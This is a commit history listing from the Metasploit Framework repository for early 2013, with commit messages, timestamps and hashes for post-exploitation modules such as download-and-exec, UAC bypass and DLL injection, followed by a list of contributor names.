Land #1687 , @bmerinofe's forensic file recovery post module
2013-05-01 08:13:08 -05:00
a201391ee6
Clean recovery_files
2013-04-30 13:18:32 -05:00
e2bf4882f0
Add domain join parse
2013-04-26 00:20:10 +01:00
235887ccb5
Finished
2013-04-25 23:25:05 +01:00
dfff20a3fc
Landing #1692 - Handles OSQL banners and responses
...
[Close #1692 ]
2013-04-22 13:58:44 -05:00
0115833724
SyntaxError fixes
2013-04-21 20:22:41 +00:00
830715dc07
Applying changes
2013-04-16 00:28:39 +02:00
a36c6d2434
Lands #1730 , adds a VERBOSE option checker
...
Also removes VERBOSE options from extant modules. There were only 5 of
them, and one was a commented option.
2013-04-15 15:32:56 -05:00
29101bad41
Removing VERBOSE offenders
2013-04-15 15:29:56 -05:00
67791c12a5
Small tidy
2013-04-14 11:18:45 +01:00
9f95b59fa0
msftidy
2013-04-14 10:34:14 +01:00
4b4f77eb0f
Finalize
2013-04-14 10:32:56 +01:00
65e5ed8950
Merge #1716 , version checker fix for UAC bypass
2013-04-09 09:00:30 -05:00
ba86e14d43
Whitespace and caps fixes
2013-04-09 08:57:53 -05:00
e2b8d5ed23
Fix from David Kennedy, enable Windows 8 support
2013-04-09 02:07:40 -05:00
a2d6f7bb17
Landing #1714 - Don't bomb out if there are no wireless interfaces
...
No redmine ticket reported.
2013-04-08 17:17:47 -05:00
f369584bbd
Timeout added
2013-04-08 23:32:07 +02:00
3660ad8c0a
Initial attempt
2013-04-07 23:03:43 +01:00
d94360c451
Merge remote branch 'upstream/master' into enum_ad_perf
2013-04-07 14:29:45 +01:00
ad46b46684
Landing #1463 , Meatballs' cdecl fixes
2013-04-04 22:58:59 -05:00
cd4a410682
Forgot an end. Dangit.
2013-03-31 23:24:50 -05:00
ac858c81a5
Deal with other osql banners and responses
...
Not sure where those other banners come from, but keeping them as
positive responses regardless.
[FixRM #7862 ]
2013-03-31 23:20:05 -05:00
d08640726b
added post module forensics recovery files
2013-03-30 01:59:41 +01:00
353f02cdcc
move word_unc_injector to gather dir
2013-03-27 16:23:19 +01:00
ed23fe6502
Merge branch 'post-word_unc_injector.rb' of https://github.com/SphaZ/metasploit-framework into SphaZ-post-word_unc_injector.rb
2013-03-27 16:21:54 +01:00
ef11a584f4
work on word_unc_injector
2013-03-27 11:17:29 +01:00
dea48b459f
Merge branch 'download_exec_shell' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-download_exec_shell
2013-03-22 12:53:36 -05:00
d908050808
Merge epo_sql fix from neinwechter
...
Easy, sensible fix -- since report_auth_info uses full_user, print_good
should too.
[Closes #1629 ]
2013-03-22 11:22:24 -05:00
096ec9a5d7
Fix to print out correct/full username
2013-03-22 10:22:24 -04:00
f27333567f
use bash or sh according to availability
2013-03-21 17:26:56 +01:00
370f849e29
cleanup for download_exec
2013-03-21 09:24:02 +01:00
39b1ad8bd6
spacing cleanup
2013-03-21 00:21:10 -04:00
837d426ff0
removed an extra space
2013-03-21 00:18:35 -04:00
08029ca2e8
edited Description
2013-03-21 00:17:55 -04:00
edd85ccd69
added wget support
2013-03-21 00:09:22 -04:00
804e2cfa3a
small fixup of unused old vars
2013-03-20 21:31:28 +01:00
b275797ba2
Used msf file mixin where possible and more in memory handling
2013-03-20 21:25:07 +01:00
54f22ed06c
check if curl is on the path
2013-03-20 17:31:48 +01:00
9948d1ec12
change from vcmd_exec to a method in the module
2013-03-19 20:40:25 -04:00
07d78af421
Linux post module to download and run a command
2013-03-15 10:13:56 -04:00
2160718250
Fix file header comment
...
[See #1555 ]
2013-03-07 17:53:19 -06:00
92ee4300df
cleanup for reflective_dll_inject
2013-03-04 17:40:09 +01:00
582395412f
Merge branch 'post_ref_dll_inj' of https://github.com/Meatballs1/metasploit-framework into Meatballs1-post_ref_dll_inj
2013-03-04 17:39:11 +01:00
3334257aa4
Merge branch 'bug/fix_screenspy' of github.com:kernelsmith/metasploit-framework into kernelsmith-bug/fix_screenspy
2013-02-26 13:54:47 -06:00
15d505f7a9
Msftidy
2013-02-22 22:09:19 +00:00
0ea7247a43
Initial commit
2013-02-22 22:05:29 +00:00
ff508fa222
msftidy
2013-02-14 21:51:50 +01:00
91f89f8c68
Rewrite of module after auxilliary. Also moved to post/windows
2013-02-14 21:41:19 +01:00
Meatballs
trustedsec
Spencer McIntyre
Tod Beardsley
David Maloney
jvazquez-r7
Meatballs1
James Lee
Joe Vennix
Tab Assassin
William Vu
sinn3r
bmerinofe
jiuweigui
Joff Thyer
Sagi Shahar
Dhiru Kholia
Rich Lundeen
root
g0tmi1k
William Vu
salcho
root
xard4s
Carlos Perez
Rob Fuller
Antoine
Tod Beardsley
HD Moore
sinn3r
Nathan Einwechter
Doug P
SphaZ
Joshua Abraham